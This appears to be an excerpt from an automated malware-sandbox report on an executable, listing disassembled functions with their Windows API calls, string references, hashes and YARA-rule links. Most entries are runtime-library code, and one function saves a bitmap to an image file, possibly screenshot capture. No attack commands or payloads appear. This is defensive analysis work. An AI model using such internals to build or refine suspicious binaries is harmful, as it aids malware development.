Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 802802c2c8d8161c1da0fccd8639febc34e315e9254c83e1febd35b1decb4a0a
Instruction ID: 435a27813ff6d6ab089d14909a9589fc169315e8e3b93c454445c14e899f43b7
Opcode Fuzzy Hash: 802802c2c8d8161c1da0fccd8639febc34e315e9254c83e1febd35b1decb4a0a
Instruction Fuzzy Hash: 7001D832348B316EA63427B57D89A272794EB053B97A2023FF715512F3EFD98C11954C

Function 0040A5FF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00408D19,?,?,?,00000000), ref: 0040A60D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00408D19,?,?,?,00000000), ref: 0040A613
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00408D19,?,?,?,00000000), ref: 0040A640
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00408D19,?,?,?,00000000), ref: 0040A64A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00408D19,?,?,?,00000000), ref: 0040A65C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0040A672

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: f582e5ede37bc774e512bbf32b62361478d8947085eb79c55118e815192aa1e8
Instruction ID: ef7ec9cb69a1804ae7ff0d0a88b2596331d161b6f782cb09cb427b9de9efc021
Opcode Fuzzy Hash: f582e5ede37bc774e512bbf32b62361478d8947085eb79c55118e815192aa1e8
Instruction Fuzzy Hash: AE019E35600255ABCB10AB76DC09BAB3678EA80754B24483AF551E12D0EB39991586AE

Function 00429FDA Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00425F7D,0044EA48,00000010), ref: 00429FDE
_free.LIBCMT ref: 0042A011
_free.LIBCMT ref: 0042A039
SetLastError.KERNEL32(00000000), ref: 0042A046
SetLastError.KERNEL32(00000000), ref: 0042A052
_abort.LIBCMT ref: 0042A058

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 40883bc0d5e10d3daec2660d21207f75cbb85bd4d3fb1a5afb63888615a4f095
Instruction ID: f6037cd31ddc7dcc6003722281cc43c8817791ac4d3f9e9f483ccf605c9aa479
Opcode Fuzzy Hash: 40883bc0d5e10d3daec2660d21207f75cbb85bd4d3fb1a5afb63888615a4f095
Instruction Fuzzy Hash: 85F08635704630ABCA223A357C4AB5B1729DBC17A5FA5006BFD14D32D2EF6CCC51916E

Function 00401534 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401549
UpdateWindow.USER32 ref: 00401551
ShowWindow.USER32(00000000), ref: 00401565
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 004015C8

Strings

lDE, xrefs: 00401569

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID: lDE
API String ID: 1339878773-741332040
Opcode ID: 33fc072db8bef723ad22e1cf40cc709e118204e498c2f4ab92f459a818fd6b01
Instruction ID: 320b7899798537779150935678db0882d89e6c40397cec9bd0fa8217753d4478
Opcode Fuzzy Hash: 33fc072db8bef723ad22e1cf40cc709e118204e498c2f4ab92f459a818fd6b01
Instruction Fuzzy Hash: BF01A5316802109BC7058F19EC08B2A7BAEE7C672AF154136F5059F272D7B09C82DF88

Function 00427FE5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00427F96,00000003,?,00427F36,00000003,0044EAA8,0000000C,0042808D,00000003,00000002), ref: 00428005
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00428018
FreeLibrary.KERNEL32(00000000,?,?,?,00427F96,00000003,?,00427F36,00000003,0044EAA8,0000000C,0042808D,00000003,00000002,00000000), ref: 0042803B

Strings

CorExitProcess, xrefs: 00428010
mscoree.dll, xrefs: 00427FFE

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c12bfbda5c16897b5635048e769d2d1d32be10017805b94070f753d73e3ff718
Instruction ID: db22af91fd385927708f0d113a19cc744cc84da91c9955e106680bde5fb034bd
Opcode Fuzzy Hash: c12bfbda5c16897b5635048e769d2d1d32be10017805b94070f753d73e3ff718
Instruction Fuzzy Hash: 0CF0C830A00218BBDF109F90DC49B9EBFF4DF08751F400079F905A2261CF385E80CA98

Function 00422E66 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c3c8e529cc92a24438417a37700b52a8f65fae8d92ba8675a10e1e93795435
Instruction ID: be7078b7bbcc1b9501c24879080b53e00350d5ca3488abfe29a4ba092bba151c
Opcode Fuzzy Hash: 84c3c8e529cc92a24438417a37700b52a8f65fae8d92ba8675a10e1e93795435
Instruction Fuzzy Hash: 5871DE31B0022A9BCF21CF94E944ABFBBB5FF41751F94022AE51067284C7789E41C7A9

Function 00428B45 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042B6AE: RtlAllocateHeap.NTDLL(00000000,004062F6,00000000,?,0041E9AB,00000002,00000000,00000000,00000000,?,0040505A,004062F6,00000004,00000000,00000000,00000000), ref: 0042B6E0

_free.LIBCMT ref: 00428C50
_free.LIBCMT ref: 00428C67
_free.LIBCMT ref: 00428C86
_free.LIBCMT ref: 00428CA1
_free.LIBCMT ref: 00428CB8

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 368aae9671f26e122032e0b29dd81718622d9db21aef45319971de9dcaa43a69
Instruction ID: 08bc33c112773df69a48afee8869723eb84da734b32babf60136f8fa9e70983b
Opcode Fuzzy Hash: 368aae9671f26e122032e0b29dd81718622d9db21aef45319971de9dcaa43a69
Instruction Fuzzy Hash: 2C512371B022149FDB20DF66EC81A6A77F4EF48724B94056FE809D7251EB39E901CB98

Function 004295DC Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042964E
_free.LIBCMT ref: 0042966E

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9b485974ca3be1c8f0ab2a0c0313cb4919ec1d66e97c23aea6f54d60a60ceb9c
Instruction ID: 825fa6c07a1127ebbf0b53fe0da80c31dcd52f95cf819436cbb5d08087eb0523
Opcode Fuzzy Hash: 9b485974ca3be1c8f0ab2a0c0313cb4919ec1d66e97c23aea6f54d60a60ceb9c
Instruction Fuzzy Hash: CB41F132B002149BCB10DF79D880A5AB3E2EF89714F5541AEE615EB391D734AD01CB89

Function 004130D3 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 004130F8

Part of subcall function 00409101: _SpinWait.LIBCONCRT ref: 00409119

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041310C
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041313E
List.LIBCMT ref: 004131C1
List.LIBCMT ref: 004131D0

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 068321dbc8f1afab39c85127f4bb354d4c81c6c1a8054a9f0e978bbb641222be
Instruction ID: 4935441b04d6a66350198aa111d5fc79678cd6262f3af443eb1d5be8493394b9
Opcode Fuzzy Hash: 068321dbc8f1afab39c85127f4bb354d4c81c6c1a8054a9f0e978bbb641222be
Instruction Fuzzy Hash: 47316A71A01616EFCB14EFA5C5416DEBBB1BF04309F04406FD44177682CB796E54CBA9

Function 004015D2 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00401604
GdipAlloc.GDIPLUS(00000010), ref: 0040160C
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00401627
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00401651
GdiplusShutdown.GDIPLUS(?), ref: 0040167D

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 8523fd636347b4cf0585a6c3a72d6c3700acc7e8b15dd08da036a0076c5da0dd
Instruction ID: 910cb6359f8c4f6131b42a709d581e078c0bfd138d2952cd33900c23b107b502
Opcode Fuzzy Hash: 8523fd636347b4cf0585a6c3a72d6c3700acc7e8b15dd08da036a0076c5da0dd
Instruction Fuzzy Hash: 432132B1A0021AAFCB00DFA5DC45AEFBBB9FF48750B144536E916E3260D7359901CBA8

Function 0042A05E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00426A18,0042CEE8,?,0042A008,00000001,00000364,?,00425F7D,0044EA48,00000010), ref: 0042A063
_free.LIBCMT ref: 0042A098
_free.LIBCMT ref: 0042A0BF
SetLastError.KERNEL32(00000000), ref: 0042A0CC
SetLastError.KERNEL32(00000000), ref: 0042A0D5

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6360b700488ddcc8cb35ba67453d1be64a593d7df6d2c6c3f596adb80de22e3f
Instruction ID: abfad478153fae373d7be01328b2a3642df7e38b3edc10bea0642fa331346648
Opcode Fuzzy Hash: 6360b700488ddcc8cb35ba67453d1be64a593d7df6d2c6c3f596adb80de22e3f
Instruction Fuzzy Hash: 2201D636701630AB86226A357C85E2B136DDBC17A5BE1006BFD15D2292EB6CC815916F

Function 004047A7 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004047B8
int.LIBCPMT ref: 004047CF

Part of subcall function 00404B4A: std::_Lockit::_Lockit.LIBCPMT ref: 00404B5B
Part of subcall function 00404B4A: std::_Lockit::~_Lockit.LIBCPMT ref: 00404B75

std::locale::_Getfacet.LIBCPMT ref: 004047D8
std::_Facet_Register.LIBCPMT ref: 00404809
std::_Lockit::~_Lockit.LIBCPMT ref: 0040481F

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetfacetRegisterstd::locale::_
String ID:
API String ID: 3122174169-0
Opcode ID: 8b5938871694eb53bfd06b4ec73049e01117ac8ceb4d845dbd0ba1ef7182d64d
Instruction ID: db843170c4f3e50edc86c61a47bbd536da8febd72a9f49836e143fbf2407b49c
Opcode Fuzzy Hash: 8b5938871694eb53bfd06b4ec73049e01117ac8ceb4d845dbd0ba1ef7182d64d
Instruction Fuzzy Hash: BE11A0B68001158BCB00FBA5C811AAE7774AFC4718F10453FE5017B2E2DB38AA45C7A9

Function 0043228A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004322A2

Part of subcall function 0042B471: HeapFree.KERNEL32(00000000,00000000,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?), ref: 0042B487
Part of subcall function 0042B471: GetLastError.KERNEL32(?,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?,?), ref: 0042B499

_free.LIBCMT ref: 004322B4
_free.LIBCMT ref: 004322C6
_free.LIBCMT ref: 004322D8
_free.LIBCMT ref: 004322EA

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 16af28226c6fcf269571d8fbfc5cecca02967926984d28251450ff7082f162c1
Instruction ID: 5d917f2a94f593c678374d069863bfbeaa2e423c9b7ca33d64a68e9a5f75ac0c
Opcode Fuzzy Hash: 16af28226c6fcf269571d8fbfc5cecca02967926984d28251450ff7082f162c1
Instruction Fuzzy Hash: 53F01836504320A78610FB55F9C1D1773D9EA04715B94589BF844E7666CB78FCC0D69C

Function 0042982B Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00429849

Part of subcall function 0042B471: HeapFree.KERNEL32(00000000,00000000,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?), ref: 0042B487
Part of subcall function 0042B471: GetLastError.KERNEL32(?,?,0043253D,?,00000000,?,00000000,?,004327E1,?,00000007,?,?,00432BD5,?,?), ref: 0042B499

_free.LIBCMT ref: 0042985B
_free.LIBCMT ref: 0042986E
_free.LIBCMT ref: 0042987F
_free.LIBCMT ref: 00429890

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d336f200cf9675cf06af49635fe4f8ac1d1cf7e8c5af6e88ce4ce6d2961ff3f2
Instruction ID: 1b46e504c84d16105f98756d8c2fc1f0ece8b5c4174e53cfc1abd60773e80f4a
Opcode Fuzzy Hash: d336f200cf9675cf06af49635fe4f8ac1d1cf7e8c5af6e88ce4ce6d2961ff3f2
Instruction Fuzzy Hash: 21F06774A01770CB8B027F25BC895843BA0E74572A396016BF8245A337CB3888C1EFCC

Function 00414ED2 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 00414EDC
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 00414F0D
GetCurrentThread.KERNEL32 ref: 00414F16
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 00414F29
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 00414F32

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: abe26269032d7be47fb8330ae543311a4b77d876f9525595df6036363f28a876
Instruction ID: 1390a8627104b82b34353e5d66c1e271f1f54d6e620d6f09e15ec43775624984
Opcode Fuzzy Hash: abe26269032d7be47fb8330ae543311a4b77d876f9525595df6036363f28a876
Instruction Fuzzy Hash: 8CF08232200A00DA8625EF22E5519EB73B5EFC4715310455EE48747651CF38E9879BAD

Function 0042AC4C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,?,?,?,00000000,00000000,00000000,?,?), ref: 0042AD59
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,?,00000000,00001000,?), ref: 0042AD65
__dosmaperr.LIBCMT ref: 0042AD6C

Strings

&B, xrefs: 0042AC4E

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2478697757.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479136518.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479290389.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479554589.0000000000452000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479698250.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2479886134.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4h1Zc12ZBe.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: &B
API String ID: 2434981716-3208460036
Opcode ID: f5bcd33f84e514e8b6c37ba96c1f79d2db7de20cfcef72ecef158e5d8829a2f5
Instruction ID: 2959e055d84fc6ab5080b770edd086c4d9c51ea0ec0a2152f6e7badcb623e835
Opcode Fuzzy Hash: f5bcd33f84e514e8b6c37ba96c1f79d2db7de20cfcef72ecef158e5d8829a2f5
Instruction Fuzzy Hash: 7C41C030B041A56FCB218F15E880A7A7FA7DF46345F6440ABEC8587A52C638CC22879E

Function 00427819 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4h1Zc12ZBe.exe,00000104), ref: 00427854
_free.LIBCMT ref: 0042791F
_free.LIBCMT ref: 00427929

Strings

C:\Users\user\Desktop\4h1Zc12ZBe.exe, xrefs: 0042784B, 00427852, 00427881, 004278B9

Memory Dump Source

Source File: 00000000.00000002.2478825602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

